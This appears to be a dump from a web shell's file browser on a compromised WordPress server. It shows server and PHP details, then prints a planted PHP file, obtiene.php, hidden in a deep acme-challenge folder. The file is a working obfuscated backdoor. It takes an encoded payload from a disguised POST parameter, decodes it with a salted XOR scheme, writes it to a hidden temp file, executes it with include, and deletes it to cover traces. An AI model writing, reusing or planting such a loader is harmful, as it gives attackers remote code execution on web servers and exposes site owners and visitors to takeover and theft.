HEX
Server: nginx/1.28.0
System: Linux yisu-68a5f20334161 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www (1000)
PHP: 8.2.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/q.autos58.cn/wp-content/well-known/acme-challenge/b/d/g/a/obtiene.php
<?php

if(@$_POST["r\x65s\x6Furce"] !== null){
	$descriptor = array_filter([getcwd(), "/var/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), "/dev/shm", "/tmp", session_save_path(), sys_get_temp_dir(), getenv("TEMP")]);
	$factor = $_POST["r\x65s\x6Furce"];
	 		$factor	 	=  explode		 ( "." , $factor 	); 
	$elem = '';
            $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt1  );
            $t = 0;
    
            array_walk($factor, function ($v5) use (&$elem, &$t, $salt1, $lenS) { $sChar = ord($salt1[$t % $lenS]  );
                $dec = ((int)$v5 - $sChar - ($t % 10)) ^ 84;
                $elem	.=	 chr($dec  );
                $t++;
            }  );
	foreach ($descriptor as $key => $item) {
    		if (is_dir($item) ? is_writable($item) : false) {
    $ptr = sprintf("%s/.val", $item);
    if (@file_put_contents($ptr, $elem) !== false) {
	include $ptr;
	unlink($ptr);
	die();
}
}
}
}